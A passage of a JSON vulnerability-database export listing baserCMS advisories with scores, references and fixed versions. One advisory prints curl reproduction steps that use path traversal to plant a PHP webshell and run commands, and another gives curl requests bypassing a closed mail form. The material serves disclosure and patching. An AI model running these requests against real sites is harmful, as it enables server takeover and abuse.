ty":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4"}],"aliases":["CVE-2021-41243","GHSA-7rpc-9m88-cf9w"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-891u-x525-ykbb"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91437?format=json","vulnerability_id":"VCID-8buz-nsr9-3yge","summary":"baserCMS Path Traversal Leads to Arbitrary File Write and RCE via Theme File API\n## Summary\n\nA path traversal vulnerability exists in the baserCMS 5.x theme file management API (`/baser/api/admin/bc-theme-file/theme_files/add.json`) that allows arbitrary file write.\n\nAn authenticated administrator can include `../` sequences in the `path` parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE).\n\n## Affected Code\n\n**File**: `plugins/bc-theme-file/src/Service/BcThemeFileService.php`\n\n```php\npublic function getFullpath(string $theme, string $plugin, string $type, string $path)\n{\n    // ...\n    return $viewPath . $type . DS . $path;  // $path is not sanitized\n}\n```\n\n## Attack Scenario\n\n1. The attacker compromises an administrator account (password leak, brute force, etc.)\n2. Obtains an access token via API login\n3. Specifies `path: \"../../../../webroot/\"` in the theme file creation API\n4. A PHP file is created in the webroot\n5. The attacker accesses the created PHP file to achieve RCE\n\n## Reproduction Steps\n\n```bash\n# 1. Login\ncurl -X POST \"http://target/baser/api/admin/baser-core/users/login.json\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"email\":\"admin@example.com\",\"password\":\"password\"}'\n\n# 2. 
Create webshell\ncurl -X POST \"http://target/baser/api/admin/bc-theme-file/theme_files/add.json\" \\\n  -H \"Authorization: Bearer <token>\" \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\n    \"theme\": \"BcThemeSample\",\n    \"plugin\": \"\",\n    \"type\": \"layout\",\n    \"path\": \"../../../../webroot/\",\n    \"base_name\": \"shell\",\n    \"ext\": \"php\",\n    \"contents\": \"<?php system($_GET[\\\"cmd\\\"]); ?>\"\n  }'\n\n# 3. RCE\ncurl \"http://target/shell.php?cmd=id\"\n```\n\n## Vulnerability Details\n\n| Item | Details |\n|------|---------|\n| CWE | CWE-22: Path Traversal, CWE-73: External Control of File Name or Path |\n| Impact | Arbitrary file write, Remote Code Execution (RCE) |\n| Attack Prerequisites | Administrator privileges + API enabled (`USE_CORE_ADMIN_API=true`), or chaining with XSS, etc. |\n| Reproducibility | High (PoC verified) |\n| Test Environment | baserCMS 5.x (Docker environment) |\n\n### Additional Notes on Attack Prerequisites\n\n- **When API is enabled** (`USE_CORE_ADMIN_API=true`): API calls can be made externally using JWT token authentication. Direct exploitation is possible.\n- **Default settings** (`USE_CORE_ADMIN_API=false`): Direct external API calls are prohibited. CSRF protection is also active, so this vulnerability alone cannot be exploited. An exploit chain involving XSS or similar is required.\n\n## Recommended Fix\n\nRather than relying on simple string replacement or blacklist checks of input, the canonicalized path (using `realpath()`, etc.) should be verified to be within the theme base directory after file creation or immediately before writing. If the path falls outside the boundary, the operation should be rejected. Because `realpath()` returns `false` for a path that does not exist yet, a check made before writing must canonicalize the parent directory and compare it against the canonicalized theme base directory including its trailing directory separator.\n\nThe specific implementation location and method are left to the project's design decisions.\n\n## Comparison with Other CMS\n\nWordPress's theme editor only allows editing within `wp-content/themes/` and does not permit writes outside that directory. 
[CVE-2019-8943](https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/) was reported as a path traversal vulnerability in `wp_crop_image()` that allowed writing cropped image output to an arbitrary directory by including `../` in the filename.\n\nThis vulnerability is not a matter of \"administrators being able to execute arbitrary code\" by design, but rather stems from a security boundary violation where \"the theme editing function can write outside the theme directory (to webroot, config, etc.).\"\n\n## Resources\n\n- OWASP Path Traversal: <https://owasp.org/www-community/attacks/Path_Traversal>\n- WordPress RCE via Path Traversal (CVE-2019-8943): <https://www.sonarsource.com/blog/wordpress-image-remote-code-execution/>\n- Jira Path Traversal (CVE-2025-22167): <https://nvd.nist.gov/vuln/detail/CVE-2025-22167>\n\nThis advisory was translated from Japanese to English using GitHub Copilot.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30940","reference_id":"","reference_type":"","scores":[{"value":"0.00145","scoring_system":"epss","scoring_elements":"0.34571","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30940"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"h
ttps://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:46:24Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-c5c6-37vq-pjcq"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30940","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30940"},{"reference_url":"https://github.com/advisories/GHSA-c5c6-37vq-pjcq","reference_id":"GHSA-c5c6-37vq-pjcq","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-c5c6-37vq-pjcq"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-30940","GHSA-c5c6-37vq-pjcq"],"risk_sco
re":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-8buz-nsr9-3yge"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90966?format=json","vulnerability_id":"VCID-8ssu-umet-37bk","summary":"baserCMS is Vulnerable to Cross-site Scripting\nbaserCMS has DOM-based cross-site scripting in tag creation.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\nMalicious JavaScript may be executed when creating a tag.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page for more information.\nhttps://basercms.net/security/JVN_94952030\n\n### Credits\n\n- quanlna2 (Le Nguyen Anh Quan)\n- namdi (Do Ich Nam)\n- minhnn42 (Nguyen Ngoc Minh)\n- VCSLab - Viettel Cyber Security","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32734","reference_id":"","reference_type":"","scores":[{"value":"0.00012","scoring_system":"epss","scoring_elements":"0.01615","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32734"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserp
roject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:50:30Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-677c-xv24-crgx"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32734","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32734"},{"reference_url":"https://github.com/advisories/GHSA-677c-xv24-crgx","reference_id":"GHSA-677c-xv24-crgx","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-677c-xv24-crgx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-32734","GHSA-677c-xv24-crgx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public
2.vulnerablecode.io/vulnerabilities/VCID-8ssu-umet-37bk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/40410?format=json","vulnerability_id":"VCID-9mf7-56fh-fyfk","summary":"Cross-site Scripting\nAn issue was discovered in baserCMS. In the Register New Category feature of the Upload menu, the category name can be used for XSS via the `data[UploaderCategory][name]` parameter to an `admin/uploader/uploader_categories/edit` URI.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-18943","reference_id":"","reference_type":"","scores":[{"value":"0.00305","scoring_system":"epss","scoring_elements":"0.54037","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00305","scoring_system":"epss","scoring_elements":"0.54093","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-18943"},{"reference_url":"https://basercms.net/release/4_1_4","reference_id":"","reference_type":"","scores":[],"url":"https://basercms.net/release/4_1_4"},{"reference_url":"https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://web.archive.org/web/20200130073341/https://basercms.net/release/4_1_4"},{"reference_url":"https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://web.archive.org/web/20211209034642/http://sunu11.com/2018/10/31/baserCMS"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-18943","reference_id":"CVE-2018-18943","reference_type":"","scores":[{"value"
:"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-18943"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/56953?format=json","purl":"pkg:composer/baserproject/basercms@4.1.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1q79-sxzp-zker"},{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-d5gk-q2hh-kba5"},{"vulnerability":"VCID-eq7f-n3g5-s3hu"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-p6nr-eu91-53b4"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-twf5-bzba-gqb4"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-vqx2-hzju-r7et"},{"vulnerability":"VCID-wvnk-63hy-ykeq"},{"vulnerability":"VCID-xpsb-2yux-g3cf"},{"vulnerability":"VCID-xxud-7jsh-bbc1"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/bas
ercms@4.1.4"}],"aliases":["CVE-2018-18943","GHSA-fx2m-5m9v-jhgp"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9mf7-56fh-fyfk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/109472?format=json","vulnerability_id":"VCID-ays7-6wvh-augt","summary":"baserCMS vulnerable to stored Cross-site Scripting\nStored cross-site scripting vulnerability in User group management of baserCMS versions prior to 4.7.2 allows a remote authenticated attacker with an administrative privilege to inject an arbitrary script.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2022-42486","reference_id":"","reference_type":"","scores":[{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.3445","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00144","scoring_system":"epss","scoring_elements":"0.34547","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2022-42486"},{"reference_url":"https://basercms.net/security/JVN_53682526","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/"}],"url":"https://basercms.net/security/JVN_53682526"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://jvn.jp/en/jp/JVN53682526/index.html","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.
1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2025-04-23T16:01:40Z/"}],"url":"https://jvn.jp/en/jp/JVN53682526/index.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42486","reference_id":"","reference_type":"","scores":[{"value":"4.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2022-42486"},{"reference_url":"https://github.com/advisories/GHSA-7w2v-35j3-xrm9","reference_id":"GHSA-7w2v-35j3-xrm9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7w2v-35j3-xrm9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/146599?format=json","purl":"pkg:composer/baserproject/basercms@4.7.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerabil
ity":"VCID-zsgc-fnen-b7a6"},{"vulnerability":"VCID-zxns-tzw3-27fr"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.7.2"}],"aliases":["CVE-2022-42486","GHSA-7w2v-35j3-xrm9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ays7-6wvh-augt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91316?format=json","vulnerability_id":"VCID-d1sf-cmct-zbh1","summary":"baserCMS has Mail Form Acceptance Bypass via Public API\n### Summary\nA public mail submission API allows unauthenticated users to submit mail form entries even when the corresponding form is not accepting submissions. This bypasses administrative controls intended to stop form intake and enables spam or abuse via the API.\n\n### Details\nIn baserCMS, mail form submissions through the front-end UI are guarded by acceptance checks implemented in `MailFrontService::isAccepting()`, which ensures that the mail form is currently accepting submissions (e.g. within its configured publish/acceptance window).\n\nThese checks are enforced in the UI flow handled by `MailController::index()` and `MailController::confirm()`  \n(e.g. `plugins/bc-mail/src/Controller/MailController.php`).\n\nHowever, the public API endpoint:\n\n`plugins/bc-mail/src/Controller/Api/MailMessagesController.php::add()`\n\ndoes not invoke `MailFrontService::isAccepting()` and does not verify whether the mail form is currently accepting submissions. As a result, the API accepts submissions regardless of the form’s acceptance state.\n\nThe endpoint does not require authentication. A valid CSRF cookie and token pair is sufficient to create a mail message. This allows submissions even when administrators intentionally disable or close the mail form via the admin UI.\n\n### PoC\n1. In the admin UI, configure a mail form so that it is **not accepting submissions** (e.g. 
outside its acceptance period or explicitly closed).\n2. Obtain a CSRF cookie by accessing the site root:\n```\ncurl -sS -D - -o - -c /tmp/basercms_cookies.txt 'http://localhost/'\n```\n3. Extract the CSRF token from the `csrfToken` cookie and submit a POST request to the public API endpoint:\n```\ncurl -sS -D - -o - -X POST 'http://localhost/baser/api/bc-mail/mail_messages/add/1.json' \n-H 'Content-Type: application/x-www-form-urlencoded' \n-H 'Referer: http://localhost/' \n-H 'X-CSRF-Token: <csrf-token-from-cookie>' \n-b /tmp/basercms_cookies.txt \n--data-urlencode 'name_1=Test' \n--data-urlencode 'name_2=User' \n--data-urlencode 'email_1=test@example.com' \n--data-urlencode 'email_2=test@example.com' \n--data-urlencode 'category[]=資料請求' \n--data-urlencode 'root=検索エンジン' \n--data-urlencode 'message=API bypass test'\n```\n4. The server responds with `200 OK` and creates a mail message, even though the form is configured to reject submissions.\n\n### Impact\nThis is an access control / business logic bypass vulnerability.\n\nAdministrators rely on the mail form acceptance settings to temporarily or permanently stop form intake (e.g. during maintenance, incidents, or spam attacks). 
This vulnerability allows attackers to bypass those controls via the public API, enabling unauthorized mail submissions, spam, and operational disruption.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30878","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05615","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30878"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"C
VSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T18:39:51Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-8cr7-r8qw-gp3c"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30878","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30878"},{"reference_url":"https://github.com/advisories/GHSA-8cr7-r8qw-gp3c","reference_id":"GHSA-8cr7-r8qw-gp3c","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-8cr7-r8qw-gp3c"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-30878","GHSA-8cr7-r8qw-gp3c"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-d1sf-cmct-zbh1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/52933?format=json","vulnerability_id":"VCID-d5gk-q2hh-kba5","summary":"Cross-site Scripting\nbaserCMS `content_info.php`, `content_options.php`, `content_related.php`, `index_list_tree.php`, 
`jquery.bcTree.js` are affected by cross-site scripting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15154","reference_id":"","reference_type":"","scores":[{"value":"0.00784","scoring_system":"epss","scoring_elements":"0.74124","published_at":"2026-06-04T12:55:00Z"},{"value":"0.00784","scoring_system":"epss","scoring_elements":"0.74157","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2020-15154"},{"reference_url":"https://basercms.net/security/20200827","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/20200827"},{"reference_url":"https://github.com/baserproject/basercms/commit/7f4b905b90954e394ec10dd35bad2a5dec505371","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/7f4b905b90954e394ec10dd35bad2a5dec505371"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-cpxc-67rc-c775","reference_id":"","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-cpxc-67rc-c775"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2020-15154","reference_id":"CVE-2020-15154","reference_type":"","scores":[{"value":"7.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:N"},{"value":"LOW","scoring_system":"generic_textual","s
